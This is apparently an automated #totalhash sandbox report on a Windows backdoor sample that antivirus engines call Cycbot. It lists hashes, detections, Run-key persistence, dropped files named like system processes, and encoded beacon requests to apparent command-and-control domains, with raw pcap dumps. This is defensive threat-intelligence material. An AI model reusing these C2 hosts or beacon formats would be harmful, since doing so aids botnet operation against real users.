Analysis | #totalhash

Analysis Date	2014-06-29 03:11:53
MD5	90d158c6281e478c00ba8a4de4879e4b
SHA1	6b05c6752e4cae9ed3047a474748f6308c86ed34

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 58c03f92ab40671a799c7bf05f87a005 sha1: e9ef13273d8b621e85fb636df401efe2f05d7546 size: 105984
Section	.tls md5: 7ea067464a15b1a445a5f597432c3e48 sha1: 0c4d1eb038e2afd98572809892bbec3f664a0c6b size: 1024
Section	.data md5: 100e164fe1346054fb5aa01131201e8f sha1: fe886cfc51ac21d73decd952285d443ce6538ca3 size: 70144
Section	.reloc md5: a2f71ea6572318f77bb98e06fa6477a1 sha1: f6c38243d619fabfe1f26c38e8c12b70da620884 size: 1024
Timestamp	2005-09-21 11:26:58
PEhash	f1640ccccad2d413aab8ee046fc2d868c88e15e3
IMPhash	ed4b9789c2425a9534579d891a7483bb
AV	360 Safe	Gen:Heur.FKP.6
AV	Ad-Aware	Gen:Heur.FKP.6
AV	Alwil (avast)	Cybota [Trj]
AV	Arcabit (arcavir)	no_virus
AV	Authentium	W32/Goolbot.K.gen!Eldorado
AV	Avira (antivir)	TR/Crypt.XPACK.Gen
AV	CA (E-Trust Ino)	Win32/FakeAlert.J!generic
AV	CAT (quickheal)	Backdoor.Cycbot.B
AV	ClamAV	Win.Trojan.Cycbot-6359
AV	Dr. Web	BackDoor.Gbot.69
AV	Emsisoft	Gen:Heur.FKP.6
AV	Eset (nod32)	Win32/Kryptik.SMY
AV	Fortinet	W32/Kryptik.SMY!tr.bdr
AV	Frisk (f-prot)	W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV	F-Secure	Gen:Heur.FKP.6
AV	Grisoft (avg)	Win32/Cryptor
AV	Ikarus	Backdoor.Win32.Cycbot
AV	K7	Backdoor ( 003210941 )
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	Backdoor.Bot
AV	Mcafee	BackDoor-EXI.gen.s
AV	Microsoft Security Essentials	Backdoor:Win32/Cycbot.G
AV	MicroWorld (escan)	Gen:Heur.FKP.6
AV	Norman	win32/Crypt.AWIO
AV	Rising	Trojan.Win32.Generic.1294F67A
AV	Sophos	Mal/FakeAV-IS
AV	Symantec	Backdoor.Cycbot!gen5
AV	Trend Micro	BKDR_CYCBOT.SME3
AV	VirusBlokAda (vba32)	BScope.Trojan.MTA.01556

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	PIPE\lsarpc
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex	{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex	{F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex	{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex	{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex	{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS	greenherbalteaonline.com
Winsock DNS	127.0.0.1
Winsock DNS	file4exchange.com
Winsock DNS	coolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process	C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS	greenherbalteaonline.com Type: A 208.73.210.203
DNS	greenherbalteaonline.com Type: A 208.73.210.205
DNS	greenherbalteaonline.com Type: A 208.73.211.173
DNS	greenherbalteaonline.com Type: A 208.73.211.246
DNS	greenherbalteaonline.com Type: A 208.73.211.249
DNS	zonedg.com Type: A 208.73.210.210
DNS	zonedg.com Type: A 208.73.211.250
DNS	zonedg.com Type: A 208.73.211.240
DNS	zonedg.com Type: A 208.73.211.237
DNS	zonedg.com Type: A 208.73.211.179
DNS	calaculat.com Type: A
DNS	file4exchange.com Type: A
DNS	coolmediaportal.com Type: A
HTTP GET	http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup250.gif?v85=69&tq=gKZEtzyajtUAI55ugFVbbVrJ%2Bjat9mQQLU61xm%2B8dbtG9%2FzaNtRItTOM31p0P1RF8RYc2tmRATqg34XLsBM6vFTlsVPz75wjy9ps9skgxc0WeqLIkHt6H0kdFJ2ym8UyWgUuwshzb%2BxwZf4bdJcQdno7pbE57Fl6PDBq10GQkCL2RfHKAOBEamHJBSjPgdLDGtYn0M5A0vpvtwee1fEdm5pN036%2B9LuUimBvW9kL0NzkWcnejDNlop2RrRwM8X22M2kICOu4MkQdzrIUzCEiJ9WbNovCCJLxsmp7hH%2BRj9qitjrGMkRdw%2ByzDFeo6qVNp94Qbx%2Bcifo7sO3%2BXyceGywj1vlFJB9SsD5PXTViwTyvXzUC8zNtzj5yKusiaWpHcBVA%2B1rr2gwIXbqaivNReZ2nrKbITyC1i%2Byq3fo%2FcOKMTNhQxvCUwaNL%2FMb9ccxklD6Wra0lJlpE0 User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwlKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0
HTTP POST	http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNwVKv975Xlm5G User-Agent: mozilla/2.0
Flows TCP	192.168.1.1:1031 ➝ 208.73.210.203:80
Flows TCP	192.168.1.1:1032 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1033 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1034 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1035 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1036 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1037 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1038 ➝ 208.73.210.210:80
Flows TCP	192.168.1.1:1039 ➝ 208.73.210.210:80

Raw Pcap

0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3235302e 6769663f   ldingcup250.gif?
0x00000030 (00048)   7638353d 36392674 713d674b 5a45747a   v85=69&tq=gKZEtz
0x00000040 (00064)   79616a74 55414935 35756746 56626256   yajtUAI55ugFVbbV
0x00000050 (00080)   724a2532 426a6174 396d5151 4c553631   rJ%2Bjat9mQQLU61
0x00000060 (00096)   786d2532 42386462 74473925 32467a61   xm%2B8dbtG9%2Fza
0x00000070 (00112)   4e745249 74544f4d 33317030 50315246   NtRItTOM31p0P1RF
0x00000080 (00128)   38525963 32746d52 41547167 3334584c   8RYc2tmRATqg34XL
0x00000090 (00144)   73424d36 7646546c 7356507a 3735776a   sBM6vFTlsVPz75wj
0x000000a0 (00160)   79397073 39736b67 78633057 65714c49   y9ps9skgxc0WeqLI
0x000000b0 (00176)   6b487436 48306b64 464a3279 6d385579   kHt6H0kdFJ2ym8Uy
0x000000c0 (00192)   57675575 7773687a 62253242 78775a66   WgUuwshzb%2BxwZf
0x000000d0 (00208)   3462644a 6351646e 6f377062 45353746   4bdJcQdno7pbE57F
0x000000e0 (00224)   6c365044 42713130 47516b43 4c325266   l6PDBq10GQkCL2Rf
0x000000f0 (00240)   484b414f 4245616d 484a4253 6a506764   HKAOBEamHJBSjPgd
0x00000100 (00256)   4c444774 596e304d 35413076 70767477   LDGtYn0M5A0vpvtw
0x00000110 (00272)   65653166 45646d35 704e3033 36253242   ee1fEdm5pN036%2B
0x00000120 (00288)   394c7555 696d4276 57396b4c 304e7a6b   9LuUimBvW9kL0Nzk
0x00000130 (00304)   57636e65 6a444e6c 6f703252 7252774d   WcnejDNlop2RrRwM
0x00000140 (00320)   38583232 4d326b49 434f7534 4d6b5164   8X22M2kICOu4MkQd
0x00000150 (00336)   7a724955 7a434569 4a395762 4e6f7643   zrIUzCEiJ9WbNovC
0x00000160 (00352)   434a4c78 736d7037 68482532 42526a39   CJLxsmp7hH%2BRj9
0x00000170 (00368)   7169746a 72474d6b 52647725 3242797a   qitjrGMkRdw%2Byz
0x00000180 (00384)   4446656f 3671564e 70393451 62782532   DFeo6qVNp94Qbx%2
0x00000190 (00400)   42636966 6f37734f 33253242 58796365   Bcifo7sO3%2BXyce
0x000001a0 (00416)   4779776a 31766c46 4a423953 73443550   Gywj1vlFJB9SsD5P
0x000001b0 (00432)   58545669 77547976 587a5543 387a4e74   XTViwTyvXzUC8zNt
0x000001c0 (00448)   7a6a3579 4b757369 61577048 63425641   zj5yKusiaWpHcBVA
0x000001d0 (00464)   25324231 72723267 77495862 71616976   %2B1rr2gwIXbqaiv
0x000001e0 (00480)   4e52655a 326e724b 62495479 43316925   NReZ2nrKbITyC1i%
0x000001f0 (00496)   32427971 33666f25 3246634f 4b4d544e   2Byq3fo%2FcOKMTN
0x00000200 (00512)   68517876 43557761 4e4c2532 464d6239   hQxvCUwaNL%2FMb9
0x00000210 (00528)   6363786b 6c443657 7261306c 4a6c7045   ccxklD6Wra0lJlpE
0x00000220 (00544)   30204854 54502f31 2e300d0a 436f6e6e   0 HTTP/1.0..Conn
0x00000230 (00560)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000240 (00576)   6f73743a 20677265 656e6865 7262616c   ost: greenherbal
0x00000250 (00592)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x00000260 (00608)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000270 (00624)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000280 (00640)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   57636e65 6a444e6c 6f703252 7252774d   WcnejDNlop2RrRwM
0x00000140 (00320)   38583232 4d326b49 434f7534 4d6b5164   8X22M2kICOu4MkQd
0x00000150 (00336)   7a724955 7a434569 4a395762 4e6f7643   zrIUzCEiJ9WbNovC
0x00000160 (00352)   434a4c78 736d7037 68482532 42526a39   CJLxsmp7hH%2BRj9
0x00000170 (00368)   7169746a 72474d6b 52647725 3242797a   qitjrGMkRdw%2Byz
0x00000180 (00384)   4446656f 3671564e 70393451 62782532   DFeo6qVNp94Qbx%2
0x00000190 (00400)   42636966 6f37734f 33253242 58796365   Bcifo7sO3%2BXyce
0x000001a0 (00416)   4779776a 31766c46 4a423953 73443550   Gywj1vlFJB9SsD5P
0x000001b0 (00432)   58545669 77547976 587a5543 387a4e74   XTViwTyvXzUC8zNt
0x000001c0 (00448)   7a6a3579 4b757369 61577048 63425641   zj5yKusiaWpHcBVA
0x000001d0 (00464)   25324231 72723267 77495862 71616976   %2B1rr2gwIXbqaiv
0x000001e0 (00480)   4e52655a 326e724b 62495479 43316925   NReZ2nrKbITyC1i%
0x000001f0 (00496)   32427971 33666f25 3246634f 4b4d544e   2Byq3fo%2FcOKMTN
0x00000200 (00512)   68517876 43557761 4e4c2532 464d6239   hQxvCUwaNL%2FMb9
0x00000210 (00528)   6363786b 6c443657 7261306c 4a6c7045   ccxklD6Wra0lJlpE
0x00000220 (00544)   30204854 54502f31 2e300d0a 436f6e6e   0 HTTP/1.0..Conn
0x00000230 (00560)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000240 (00576)   6f73743a 20677265 656e6865 7262616c   ost: greenherbal
0x00000250 (00592)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x00000260 (00608)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000270 (00624)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000280 (00640)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 72633d22   n: close....rc="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a724955 7a434569 4a395762 4e6f7643   .rIUzCEiJ9WbNovC
0x00000160 (00352)   434a4c78 736d7037 68482532 42526a39   CJLxsmp7hH%2BRj9
0x00000170 (00368)   7169746a 72474d6b 52647725 3242797a   qitjrGMkRdw%2Byz
0x00000180 (00384)   4446656f 3671564e 70393451 62782532   DFeo6qVNp94Qbx%2
0x00000190 (00400)   42636966 6f37734f 33253242 58796365   Bcifo7sO3%2BXyce
0x000001a0 (00416)   4779776a 31766c46 4a423953 73443550   Gywj1vlFJB9SsD5P
0x000001b0 (00432)   58545669 77547976 587a5543 387a4e74   XTViwTyvXzUC8zNt
0x000001c0 (00448)   7a6a3579 4b757369 61577048 63425641   zj5yKusiaWpHcBVA
0x000001d0 (00464)   25324231 72723267 77495862 71616976   %2B1rr2gwIXbqaiv
0x000001e0 (00480)   4e52655a 326e724b 62495479 43316925   NReZ2nrKbITyC1i%
0x000001f0 (00496)   32427971 33666f25 3246634f 4b4d544e   2Byq3fo%2FcOKMTN
0x00000200 (00512)   68517876 43557761 4e4c2532 464d6239   hQxvCUwaNL%2FMb9
0x00000210 (00528)   6363786b 6c443657 7261306c 4a6c7045   ccxklD6Wra0lJlpE
0x00000220 (00544)   30204854 54502f31 2e300d0a 436f6e6e   0 HTTP/1.0..Conn
0x00000230 (00560)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000240 (00576)   6f73743a 20677265 656e6865 7262616c   ost: greenherbal
0x00000250 (00592)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x00000260 (00608)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000270 (00624)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000280 (00640)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a2f703e 0a20203c 6872202f 3e0a2020   ./p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a724955 7a434569 4a395762 4e6f7643   .rIUzCEiJ9WbNovC
0x00000160 (00352)   434a4c78 736d7037 68482532 42526a39   CJLxsmp7hH%2BRj9
0x00000170 (00368)   7169746a 72474d6b 52647725 3242797a   qitjrGMkRdw%2Byz
0x00000180 (00384)   4446656f 3671564e 70393451 62782532   DFeo6qVNp94Qbx%2
0x00000190 (00400)   42636966 6f37734f 33253242 58796365   Bcifo7sO3%2BXyce
0x000001a0 (00416)   4779776a 31766c46 4a423953 73443550   Gywj1vlFJB9SsD5P
0x000001b0 (00432)   58545669 77547976 587a5543 387a4e74   XTViwTyvXzUC8zNt
0x000001c0 (00448)   7a6a3579 4b757369 61577048 63425641   zj5yKusiaWpHcBVA
0x000001d0 (00464)   25324231 72723267 77495862 71616976   %2B1rr2gwIXbqaiv
0x000001e0 (00480)   4e52655a 326e724b 62495479 43316925   NReZ2nrKbITyC1i%
0x000001f0 (00496)   32427971 33666f25 3246634f 4b4d544e   2Byq3fo%2FcOKMTN
0x00000200 (00512)   68517876 43557761 4e4c2532 464d6239   hQxvCUwaNL%2FMb9
0x00000210 (00528)   6363786b 6c443657 7261306c 4a6c7045   ccxklD6Wra0lJlpE
0x00000220 (00544)   30204854 54502f31 2e300d0a 436f6e6e   0 HTTP/1.0..Conn
0x00000230 (00560)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000240 (00576)   6f73743a 20677265 656e6865 7262616c   ost: greenherbal
0x00000250 (00592)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x00000260 (00608)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000270 (00624)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000280 (00640)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
